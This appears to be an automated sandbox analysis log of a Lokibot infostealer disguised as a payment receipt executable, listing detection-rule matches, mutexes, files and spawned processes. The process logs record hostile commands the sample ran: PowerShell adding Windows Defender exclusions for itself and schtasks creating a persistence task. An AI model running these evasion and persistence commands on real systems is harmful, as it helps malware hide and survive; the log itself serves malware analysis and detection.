Source: 17.2.euKeoTytdT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 17.2.euKeoTytdT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 17.2.euKeoTytdT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 17.2.euKeoTytdT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 17.2.euKeoTytdT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 11.2.euKeoTytdT.exe.40d1e68.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 11.2.euKeoTytdT.exe.40d1e68.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 11.2.euKeoTytdT.exe.40d1e68.5.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 11.2.euKeoTytdT.exe.40d1e68.5.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.2228686790.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000001.00000002.2228686790.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000001.00000002.2228686790.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.2289569837.00000000040D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0000000B.00000002.2289569837.00000000040D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0000000B.00000002.2289569837.00000000040D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.2229898655.0000000003A47000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000001.00000002.2229898655.0000000003A47000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000001.00000002.2229898655.0000000003A47000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.2289569837.00000000040B7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0000000B.00000002.2289569837.00000000040B7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0000000B.00000002.2289569837.00000000040B7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.2286478638.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0000000B.00000002.2286478638.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0000000B.00000002.2286478638.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.2265215061.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000011.00000002.2265215061.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000011.00000002.2265215061.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000011.00000002.2265215061.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.2265215061.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000001.00000002.2229898655.0000000003A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000001.00000002.2229898655.0000000003A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000001.00000002.2229898655.0000000003A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe PID: 5100, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: euKeoTytdT.exe PID: 7252, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: euKeoTytdT.exe PID: 7596, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23

Source: Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: euKeoTytdT.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3b865b8.5.raw.unpack, UN2Il68uhcF7U4lhr2.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3b865b8.5.raw.unpack, UN2Il68uhcF7U4lhr2.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3b865b8.5.raw.unpack, UN2Il68uhcF7U4lhr2.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3b865b8.5.raw.unpack, iv44OGPSNhRq8nPoMQ.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3b865b8.5.raw.unpack, iv44OGPSNhRq8nPoMQ.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.70a0000.7.raw.unpack, iv44OGPSNhRq8nPoMQ.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.70a0000.7.raw.unpack, iv44OGPSNhRq8nPoMQ.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.70a0000.7.raw.unpack, UN2Il68uhcF7U4lhr2.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.70a0000.7.raw.unpack, UN2Il68uhcF7U4lhr2.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.70a0000.7.raw.unpack, UN2Il68uhcF7U4lhr2.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3b28198.3.raw.unpack, UN2Il68uhcF7U4lhr2.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3b28198.3.raw.unpack, UN2Il68uhcF7U4lhr2.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3b28198.3.raw.unpack, UN2Il68uhcF7U4lhr2.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3b28198.3.raw.unpack, iv44OGPSNhRq8nPoMQ.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3b28198.3.raw.unpack, iv44OGPSNhRq8nPoMQ.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@25/17@1/1

Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe

Code function: 17_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,

17_2_0040434D

Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe

File created: C:\Users\user\AppData\Roaming\euKeoTytdT.exe

Jump to behavior

Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6492:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7076:120:WilError_03
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Mutant created: \Sessions\1\BaseNamedObjects\OZqyWSIHItKSIVvhK
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7532:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4208:120:WilError_03

Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe

File created: C:\Users\user\AppData\Local\Temp\tmp5805.tmp

Jump to behavior

Source: Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	ReversingLabs: Detection: 55%
Source: Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Virustotal: Detection: 56%

Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe

File read: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe "C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe"
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\euKeoTytdT.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\euKeoTytdT" /XML "C:\Users\user\AppData\Local\Temp\tmp5805.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process created: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe "C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe"
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process created: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe "C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\euKeoTytdT.exe C:\Users\user\AppData\Roaming\euKeoTytdT.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\euKeoTytdT" /XML "C:\Users\user\AppData\Local\Temp\tmp707F.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Process created: C:\Users\user\AppData\Roaming\euKeoTytdT.exe "C:\Users\user\AppData\Roaming\euKeoTytdT.exe"
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Process created: C:\Users\user\AppData\Roaming\euKeoTytdT.exe "C:\Users\user\AppData\Roaming\euKeoTytdT.exe"
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Process created: C:\Users\user\AppData\Roaming\euKeoTytdT.exe "C:\Users\user\AppData\Roaming\euKeoTytdT.exe"
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\euKeoTytdT.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\euKeoTytdT" /XML "C:\Users\user\AppData\Local\Temp\tmp5805.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process created: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe "C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process created: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe "C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\euKeoTytdT" /XML "C:\Users\user\AppData\Local\Temp\tmp707F.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Process created: C:\Users\user\AppData\Roaming\euKeoTytdT.exe "C:\Users\user\AppData\Roaming\euKeoTytdT.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Process created: C:\Users\user\AppData\Roaming\euKeoTytdT.exe "C:\Users\user\AppData\Roaming\euKeoTytdT.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Process created: C:\Users\user\AppData\Roaming\euKeoTytdT.exe "C:\Users\user\AppData\Roaming\euKeoTytdT.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Section loaded: profapi.dll	Jump to behavior
